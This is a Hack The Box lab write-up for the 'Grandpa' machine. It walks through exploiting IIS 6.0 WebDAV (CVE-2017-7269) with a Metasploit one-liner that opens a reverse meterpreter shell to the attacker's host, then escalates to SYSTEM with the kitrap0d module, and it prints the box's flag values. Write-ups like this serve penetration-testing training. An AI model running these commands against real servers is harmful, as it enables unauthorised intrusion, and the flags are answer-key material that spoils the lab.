Grandpa
About
Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.
Enumeration
Running the script portscan.sh reveals a single attack vector, HTTP.
┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ sudo portscan.sh 10.129.95.233
┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ cat PortScan\(10.129.95.233\)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Sat, 09 Sep 2023 04:32:16 GMT
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
HTTP
Since nmap revealed the HTTP service Microsoft IIS 6.0 running on the target, I’ll check if there are any known vulnerabilities for it using searchsploit-prettify.py. From the results, I’ll start by testing Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow as it seems to directly allow remote code execution.
┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ searchsploit-prettify.py 'Microsoft IIS 6.0'
---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title | Path |
---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | /usr/share/exploitdb/exploits/windows/remote/21057.txt |
| Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | /usr/share/exploitdb/exploits/windows/remote/9541.pl |
| Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | /usr/share/exploitdb/exploits/windows/dos/9587.txt |
| Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | /usr/share/exploitdb/exploits/windows/dos/3965.pl |
| Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | /usr/share/exploitdb/exploits/windows/dos/15167.txt |
| Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | /usr/share/exploitdb/exploits/windows/remote/41738.py |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | /usr/share/exploitdb/exploits/windows/remote/8704.txt |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | /usr/share/exploitdb/exploits/windows/remote/8806.pl |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | /usr/share/exploitdb/exploits/windows/remote/8754.patch |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | /usr/share/exploitdb/exploits/windows/remote/8765.php |
| Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | /usr/share/exploitdb/exploits/windows/remote/19033.txt |
---------------------------------------------------------------------------------------- ---------------------------------------------------------
Using a Metasploit module for the same vulnerability, I’m able to gain a shell on the target. However, running the command getuid fails with an error message indicating that the access is denied. This is sometimes caused when the session we are using is spawned under a process without enough privileges.
┌──(m0nk3y@kali)-[~/HTB/Grandpa]
└─$ msfconsole -q -x 'use exploit/windows/iis/iis_webdav_scstoragepathfromurl; set RHOSTS 10.129.95.233; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.95.233
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.95.233
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.95.233:1032) at 2023-09-09 00:37:40 -0400
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
By migrating to another process with higher privileges, I’m able to gain a shell as the user NT AUTHORITY\NETWORK SERVICE.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
148 1084 cidaemon.exe
216 1084 cidaemon.exe
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
772 392 svchost.exe
796 392 svchost.exe
944 392 spoolsv.exe
972 392 msdtc.exe
1084 392 cisvc.exe
1132 392 svchost.exe
1188 392 inetinfo.exe
1224 392 svchost.exe
1324 392 VGAuthService.exe
1408 392 vmtoolsd.exe
1508 392 svchost.exe
1624 392 svchost.exe
1796 392 dllhost.exe
1968 392 alg.exe
1996 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2444 584 wmiprvse.exe
2748 344 logon.scr
3344 1508 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
3420 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3748 3344 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
4056 1084 cidaemon.exe
meterpreter > migrate 1996
[*] Migrating from 3748 to 1996...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Privilege Escalation
In order to look for local vulnerabilities, I’ll use the module post/multi/recon/local_exploit_suggester. From the result, we can check that it revealed 7 potential exploits that can be used.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.129.95.233 - Collecting local exploits for x86/windows...
[*] 10.129.95.233 - 186 exploit checks are being tried...
[+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.95.233 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
8 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
10 exploit/windows/local/always_install_elevated No The target is not exploitable.
11 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
12 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception.
13 exploit/windows/local/bthpan No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
19 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
20 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
21 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
22 exploit/windows/local/ikeext_service No The check raised an exception.
23 exploit/windows/local/ipass_launch_app No The check raised an exception.
24 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
25 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
26 exploit/windows/local/mqac_write No The target is not exploitable.
27 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
28 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
29 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
With a bit of brute-force, I’m able to use the module exploit/windows/local/ms10_015_kitrap0d to gain a shell as the user NT AUTHORITY\SYSTEM.
meterpreter > run exploit/windows/local/ms10_015_kitrap0d LHOST=10.10.16.9 LPORT=4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3228 launched.
[*] Reflectively injecting the DLL into 3228...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.95.233
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.95.233:1034) at 2023-09-09 00:48:38 -0400
[*] Session 2 created in the background.
meterpreter > sessions 2
[*] Backgrounding session 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'
bdff5ec67c3cff017f2bedc146a5d869
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
9359e905a2c35f861f6a57cecf28bb7b